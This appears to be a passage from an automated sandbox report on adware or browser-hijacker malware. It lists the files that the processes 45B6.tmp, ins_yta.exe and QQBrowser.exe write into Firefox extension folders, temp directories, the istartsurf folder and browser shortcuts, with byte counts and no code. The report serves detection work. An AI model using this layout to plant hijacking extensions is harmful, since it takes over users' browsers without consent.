C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\246.js (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\9.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\180.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\be2e56a5a3ee6d636c5685892d7d480e.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\userCode\background.js (433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\5279ca410382aa56128d34e782f9e4a4.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\4.js (3410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\21.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\manifest.xml (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\7ff370df4fefd7ec8f92c495d67b68ae.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\1.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\a5077b4f6a3a26be31c44e6b60cf1917.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\63a4389a5f78644a1ccf4fb4bbf8dbf9.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\69f994bab5f48373ad13b4965111f6fe.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon24.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\376.js (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\fe20840082702bf2101a1456258e419b.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\195.js (414 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\345.js (663 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\102.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\options.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button2.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\4a54df600e32863fa3ca6e327297891e.js (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\skin.css (899 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button1.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\98.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\18b0782717c0a7ce62a11e043d2a8759.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\183.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\d2631eb9a769a3fbb2daac52c09fbf61.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\aaf9780bed6a32289445678dd9507bea.js (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome.manifest (622 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\e4b09a3d09de28e2f8cec8a93ef85ea8.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\54e21ad6046a6abadafa67ad23673daf.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\f81f1afa5beefc45d6b53c5c7482ffda.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button3.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\1f2ded915cc3524f789dd42de02b8665.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\22.js (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\c60be51da85db7f8f469322182677351.js (134 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\47.js (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\1adfac8870bf8f5c6f07033cc6c119d1.js (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\242.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\installer.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\search_dialog.xul (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\install.rdf (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon128.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins.json (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\4f13fb5d8cac4f57cbf5e6b64e4bc4e3.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\14.js (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\f68f5b6e3809b8233025ed6dcab5c45a.js (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\7.js (689 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\385.js (805 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon16.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\391.js (801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\68f01be757cbefe2878c12b87d9f7f9a.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\locale\en-US\translations.dtd (429 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\200.js (813 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\184.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\223.js (829 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\a61368b495e897aad729e6b095caafd1.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\a5aff4a160320a52a862ffa7da301bf5.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\crossrider_statusbar.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\17.js (2473 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\0168d4d33d6df27732eb8b5699128025.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\13.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\popup.html (353 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\34e7fb695b67660a97013c67488368dc.js (947 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\update.css (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\35cbd7aeb6004db3d2778a6f4716a2d5.js (618 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\290.js (897 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\78.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\444cf54dbe4ed104d12c04bfc893cdb9.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\2938f662dcb9bf825374bdbaa1fab291.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\288.js (969 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\91.js (6772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\af66d255e6d2bb2228e4fb427766f91e.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\options.xul (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\faba5f82eda8f1d41c4f31a58aedf8d6.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\399.js (525 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\ffCoreFilesIndex.txt (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\ab0256e7c7c0f522c3741adff2590815.js (964 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\220.js (1592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button5.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button4.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\7f9ecc8563d601e115e880fc47c2d274.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\207.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\a0f3ea74f95a64204152933e45b1bff4.js (649 bytes)

The process 45B6.tmp:3512 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Swift Record\lm (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\NSISEncrypt.dll (3320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Swift Record\mj (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\WmiInspector.dll (3137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\nsJSON.dll (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Swift Record\tlg (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\IpConfig.dll (4254 bytes)

The process ins_yta.exe:3216 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLB61FD.tmp (144 bytes)

The process QQBrowser.exe:4888 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\tmp\wpm_v20.0.0.1953_0302.exe (988 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\tmp\XTab_Setup2121.exe (148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\tmp\474.db (155 bytes)

The process QQBrowser.exe:3168 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\C37D.tmp (113 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\defaults\preferences\fvd.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\pack\common.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\fr\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\index.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\last_tab.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\module\stat.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\C3BE.tmp (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\module\search.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\en-US\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\style.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\restoreprefs.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\logo.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\misc.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\loading.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\scrollbar.bmp (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\remoterequest.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\ru\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\C39D.tmp (113 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\js.js (660 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code6.jpg (5 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\C3AE.tmp (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\addonmanager.js (531 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\quick_start.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\quick_start.xul (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome.manifest (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\uninstallDlg2.xml (19 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\defaults\preferences\preferences.js (379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\en\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\default_logo.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (486 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\properties.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg.png (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\simple.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\icon.png (628 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\googlelogo.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\include\tools\misc.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\474.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\es-419\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\it\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\include\speed_dial.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
